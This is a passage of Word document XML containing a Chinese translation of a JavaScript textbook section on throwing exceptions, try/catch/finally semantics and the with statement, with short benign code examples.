        <w:t>0)throw new Error("x</w:t>
      </w:r>
      <w:r>
        <w:t>不能是负数</w:t>
      </w:r>
      <w:r>
        <w:t>");//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，计算出一个值，并正常地返回它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var f=1;x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1;f*=x,x--)/*empty*/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return f;</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当抛出异常时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器会立即停止当前正在执行的逻辑，并跳转至就近的异常处理程序。异常处理程序是用</w:t>
      </w:r>
      <w:r>
        <w:t>try/catch/finally</w:t>
      </w:r>
      <w:r>
        <w:t>语句的</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句编写的，下一节会介绍它。如果抛出异常的代码块没有一条相关联的</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句，解释器会检查更高层的闭合代码块，看它是</w:t>
      </w:r>
      <w:r>
        <w:t>否有相关联的异常处理程序。以此类推，直到找到一个异常处理程序为止。如果抛出异常的函数没有处理它的</w:t>
      </w:r>
      <w:r>
        <w:t>try/catch/finally</w:t>
      </w:r>
      <w:r>
        <w:t>语句，异常将向上传播到调用该函数的代码。这</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>样的话，异常就会沿着</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>方法的词法结构和调用栈向上传播。如果没有找到任何异常处理程序，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将把异常当成程序错误来处理，并报告给用户。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="5_6_6_try_catch_finallyYu_Ju_"/>
      <w:r>
        <w:t>5.6.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>try/catch/finally</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>try/catch/finally</w:t>
      </w:r>
      <w:r>
        <w:t>语句是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的异常处理机制。其中</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>从句定义了需要处理的异常所在的代码块</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句跟随在</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>从句之后，当</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>块内某处发生了异常时，调用</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>内的代码逻辑。</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句后跟随</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>块，后者中放置清理代码，不管</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>块中是否产生异常，</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>块内的逻辑总是会执行。尽管</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>都是可选的，但</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>从句需要至少二者之一与之组成完整的语句。</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>语句块都需要使用花括号括起来，这里的花括号是必需的，即使从句中只有一条语句也不能省略花括号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的代码说明了</w:t>
      </w:r>
      <w:r>
        <w:t>try/catch/finally</w:t>
      </w:r>
      <w:r>
        <w:t>的语法和使用目的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>y{//</w:t>
      </w:r>
      <w:r>
        <w:t>通常来讲，这里的代码会从头执行到尾而不会产生任何问题，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但有时会抛出一个异常，要么是由</w:t>
      </w:r>
      <w:r>
        <w:t>throw</w:t>
      </w:r>
      <w:r>
        <w:t>语句直接抛出异常，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>要么是通过调用一个方法间接抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>当且仅当</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>语句块抛出了异常，才会执行这里的代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里可以通过局部变量</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>来获得对</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象或者抛出的其他值的引用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里的代码块可以基于某种原因处理这个异常，也可以忽略这个异常，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>还可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>throw</w:t>
      </w:r>
      <w:r>
        <w:t>语句重新抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>finally{//</w:t>
      </w:r>
      <w:r>
        <w:t>不管</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>语句块是否抛出了异常，这里的逻辑总是会执行，终止</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>语句块的方式有：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//1</w:t>
      </w:r>
      <w:r>
        <w:t>）正常终止，执行完语句块的最后一条语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//2</w:t>
      </w:r>
      <w:r>
        <w:t>）通过</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句终止</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//3</w:t>
      </w:r>
      <w:r>
        <w:t>）抛出一个异常，异常被</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句捕获</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//4</w:t>
      </w:r>
      <w:r>
        <w:t>）抛出一个异常，异常未被捕获，继续向上传播</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我们注意到，关键字</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>后跟随了一对圆括号，圆括号内是一个标识符。这个标识符和函数参数很像。当捕获一个异常时，把和这个异常相关的值（比如</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象）赋值给这个参数。和普通的变量不同，这条</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>atch</w:t>
      </w:r>
      <w:r>
        <w:t>子句中的标识符具有块级作用域，它只在</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>语句块内有定义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里有一个关于</w:t>
      </w:r>
      <w:r>
        <w:t>try/catch</w:t>
      </w:r>
      <w:r>
        <w:t>语句更实际的例子，这里使用了前面章节中提到的</w:t>
      </w:r>
      <w:r>
        <w:t>factorial()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，并使用客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>prompt()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>来输入和输出：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{//</w:t>
      </w:r>
      <w:r>
        <w:t>要求用户输入一个数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var n=Number(prompt("</w:t>
      </w:r>
      <w:r>
        <w:t>请输入一个正整数</w:t>
      </w:r>
      <w:r>
        <w:t>",""));//</w:t>
      </w:r>
      <w:r>
        <w:t>假设输入是合法的，计算这个数的阶乘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var f=factorial(n);//</w:t>
      </w:r>
      <w:r>
        <w:t>显示结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert(n+"!="+f);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e</w:t>
      </w:r>
      <w:r>
        <w:t>x){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果输入不合法，将执行这里的逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert(ex);//</w:t>
      </w:r>
      <w:r>
        <w:t>告诉用户产生了什么错误</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这里的</w:t>
      </w:r>
      <w:r>
        <w:t>try/catch</w:t>
      </w:r>
      <w:r>
        <w:t>语句并不包含</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>从句。尽管</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>不像</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>那样经常使用，但有时候它还是非常有用。然而，我们需要更详尽地解释它的行为。不管</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>语句块中的代码执行完成了多少，只要</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>语句中有一部分代码执行了，</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>从句就会执行。它通常在</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>从句的代码后用于清理工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常状况下，解释器执行到</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>块的尾部，然后开始执行</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>中的逻辑，以便进行必要的清理工作。当由于</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句使得解释器跳出</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>语句块时，解释器在执行新的目标代码之前先执行</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>块中的逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果在</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>中产生了异常，而且存在一条与之相关的</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句来处理这个异常，解释器会首先执行</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>中的逻辑，然后执行</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>中的逻辑。如果不存在处理异常的局部</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句，解释器会首先执行</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>中的逻辑，然后向上传播这个异常，直到找到能处理这个异常的</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>块使用了</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>throw</w:t>
      </w:r>
      <w:r>
        <w:t>语</w:t>
      </w:r>
      <w:r>
        <w:t>句使程序发生跳转，或者通过调用了抛出异常的方法改变了程序执行流程，不管这个跳转使程序挂起还是继续执行，解释器都会将其忽略。例如，如果</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>从句抛出一个异常，这个异常将替代正在抛出的异常。如果</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>从句运行到了</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句，尽管已经</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>抛出了异常且这个抛出的异常还没有处理，这个方法依然会正常返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在没有</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句的情况下</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>从句可以和</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>从句一起使用。在这种情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>块只包含清理代码，不管</w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>块中是否有</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句，这里的</w:t>
      </w:r>
      <w:r>
        <w:t>代码一定会执行，回想一下，我们无法完全精确地使用</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环来模拟</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环，因为</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句在两个循环中的行为表现不一致。如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>try/finally</w:t>
      </w:r>
      <w:r>
        <w:t>语句，就能使用</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环来正确模拟包含</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>模拟</w:t>
      </w:r>
      <w:r>
        <w:t>for(initialize;test;increment)body;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>initialize;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(test){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{body;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>finally{increment;}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然而需要注意的是，当</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>语句时，</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环和</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环便有了更微妙的区别（造成了一次额外的自增运算），因此即便使用了</w:t>
      </w:r>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:t>从句，使用</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>来完全模拟</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环依然是不可能的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="5_7_Qi_Ta_Yu_Ju_Lei_Xing_"/>
      <w:r>
        <w:t>5.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　其他语句类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本节讨论剩余的三种</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
      <w:r>
        <w:t>——width</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>debugger</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>use strict</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="5_7_1_withYu_Ju_"/>
      <w:r>
        <w:t>5.7.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.10.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节讨论了作用域链（</w:t>
      </w:r>
      <w:r>
        <w:t>scope chain</w:t>
      </w:r>
      <w:r>
        <w:t>），一个可以按序检索的对象列表，通过它可以进行变量名解析。</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句用于临时扩展作用域链，它具有如</w:t>
      </w:r>
      <w:r>
        <w:t>下的语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>with(object)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这条语句将</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>添加到作用域链的头部，然后执行</w:t>
      </w:r>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
      <w:r>
        <w:t>，最后把作用域链恢复到原始状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在严格模式中（参照</w:t>
      </w:r>
      <w:r>
        <w:t>5.7.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）是禁止使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句的，并且在非严格模式里也是不推荐使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句的，尽可能避免使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句。那些使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
